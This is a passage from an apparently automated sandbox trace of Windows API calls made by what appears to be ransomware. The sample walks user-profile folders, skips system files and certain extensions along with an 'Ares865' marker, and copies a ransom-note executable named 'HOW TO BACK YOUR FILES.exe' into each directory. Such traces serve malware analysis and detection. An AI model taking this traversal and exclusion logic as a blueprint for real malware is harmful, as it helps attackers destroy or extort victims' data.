1 [0042.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.283] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.283] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.283] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.284] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.284] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.284] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac78c80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.284] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.284] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="aoldtz.exe") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="..") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="windows") returned -1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="bootmgr") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="temp") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="pagefile.sys") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="boot") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="ids.txt") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="ntuser.dat") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="perflogs") returned 1 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="MSBuild") returned 1 [0042.284] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0042.284] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 105 [0042.284] lstrcpyW (in: lpString1=0x2e2e930, lpString2="Web Slice Gallery~.feed-ms" | out: lpString1="Web Slice Gallery~.feed-ms") returned="Web Slice Gallery~.feed-ms" [0042.284] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0042.284] lstrlenW (lpString="Ares865") returned 7 [0042.284] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.284] lstrlenW (lpString=".dll") returned 4 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".dll") returned 1 [0042.284] lstrlenW (lpString=".lnk") returned 4 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".lnk") returned 1 [0042.284] lstrlenW (lpString=".ini") returned 4 [0042.284] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".ini") returned 1 [0042.284] lstrlenW (lpString=".sys") returned 4 [0042.285] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".sys") returned 1 [0042.285] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0042.285] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.285] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned 69 [0042.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.285] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.285] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.292] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.292] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.292] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.292] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.292] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.292] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.293] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.293] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.293] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.293] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.293] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.293] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.293] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeaa2466, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2="aoldtz.exe") returned 1 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".") returned 1 [0042.293] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="Microsoft at Home~.feed-ms" | out: lpString1="Microsoft at Home~.feed-ms") returned="Microsoft at Home~.feed-ms" [0042.293] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0042.293] lstrlenW (lpString="Ares865") returned 7 [0042.293] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.293] lstrlenW (lpString=".dll") returned 4 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".dll") returned 1 [0042.293] lstrlenW (lpString=".lnk") returned 4 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".lnk") returned 1 [0042.293] lstrlenW (lpString=".ini") returned 4 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".ini") returned 1 [0042.293] lstrlenW (lpString=".sys") returned 4 [0042.293] lstrcmpiW (lpString1="Microsoft at Home~.feed-ms", lpString2=".sys") returned 1 [0042.293] lstrlenW (lpString="Microsoft at Home~.feed-ms") returned 26 [0042.293] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="Microsoft at Work~.feed-ms" | out: lpString1="Microsoft at Work~.feed-ms") returned="Microsoft at Work~.feed-ms" [0042.293] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0042.293] lstrlenW (lpString="Ares865") returned 7 [0042.293] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.293] lstrlenW (lpString=".dll") returned 4 [0042.293] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".dll") returned 1 [0042.293] lstrlenW (lpString=".lnk") returned 4 [0042.294] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".lnk") returned 1 [0042.294] lstrlenW (lpString=".ini") returned 4 [0042.294] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".ini") returned 1 [0042.294] lstrlenW (lpString=".sys") returned 4 [0042.294] lstrcmpiW (lpString1="Microsoft at Work~.feed-ms", lpString2=".sys") returned 1 [0042.294] lstrlenW (lpString="Microsoft at Work~.feed-ms") returned 26 [0042.294] lstrcpyW (in: lpString1=0x2e2e8ec, lpString2="MSNBC News~.feed-ms" | out: lpString1="MSNBC News~.feed-ms") returned="MSNBC News~.feed-ms" [0042.294] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0042.294] lstrlenW (lpString="Ares865") returned 7 [0042.294] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0042.294] lstrlenW (lpString=".dll") returned 4 [0042.294] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".dll") returned 1 [0042.294] lstrlenW (lpString=".lnk") returned 4 [0042.294] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".lnk") returned 1 [0042.294] lstrlenW (lpString=".ini") returned 4 [0042.294] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".ini") returned 1 [0042.294] lstrlenW (lpString=".sys") returned 4 [0042.294] lstrcmpiW (lpString1="MSNBC News~.feed-ms", lpString2=".sys") returned 1 [0042.294] lstrlenW (lpString="MSNBC News~.feed-ms") returned 19 [0042.294] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" [0042.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0042.294] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.294] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned 58 [0042.294] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials" [0042.294] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.294] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.300] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.300] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.300] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.300] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.300] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History") returned="C:\\Users\\Default User\\Local Settings\\History" [0042.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0042.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.300] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History") returned 44 [0042.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History") returned="C:\\Users\\Default User\\Local Settings\\History" [0042.300] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.300] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.306] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.306] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.306] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.306] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.306] lstrcpyW (in: lpString1=0x2e2e8ba, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.306] lstrlenW (lpString="desktop.ini") returned 11 [0042.306] lstrlenW (lpString="Ares865") returned 7 [0042.306] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.307] lstrlenW (lpString=".dll") returned 4 [0042.307] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.307] lstrlenW (lpString=".lnk") returned 4 [0042.307] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.307] lstrlenW (lpString=".ini") returned 4 [0042.307] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.307] lstrlenW (lpString=".sys") returned 4 [0042.307] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.307] lstrlenW (lpString="desktop.ini") returned 11 [0042.307] lstrcpyW (in: lpString1=0x2e2e8ba, lpString2="History.IE5" | out: lpString1="History.IE5") returned="History.IE5" [0042.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0042.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1608 [0042.307] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0042.307] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.307] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.307] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0042.307] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.307] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0042.307] lstrcpyW (in: lpString1=0x2e2e8ba, lpString2="Low" | out: lpString1="Low") returned="Low" [0042.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0042.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d1ea0 [0042.307] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0042.307] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0042.307] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.307] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2388 [0042.307] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\History\\Low" [0042.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.307] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\Low") returned 48 [0042.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\History\\Low" [0042.308] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.308] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.312] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.312] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.312] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.312] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.312] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" [0042.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0042.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0042.312] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned 56 [0042.312] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\History\\History.IE5" [0042.312] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.312] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.322] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.322] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.322] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.322] lstrcpyW (in: lpString1=0x2e2e8d2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.322] lstrlenW (lpString="desktop.ini") returned 11 [0042.322] lstrlenW (lpString="Ares865") returned 7 [0042.322] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.322] lstrlenW (lpString=".dll") returned 4 [0042.322] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.322] lstrlenW (lpString=".lnk") returned 4 [0042.322] lstrcmpiW (lpString1="desktop.ini", 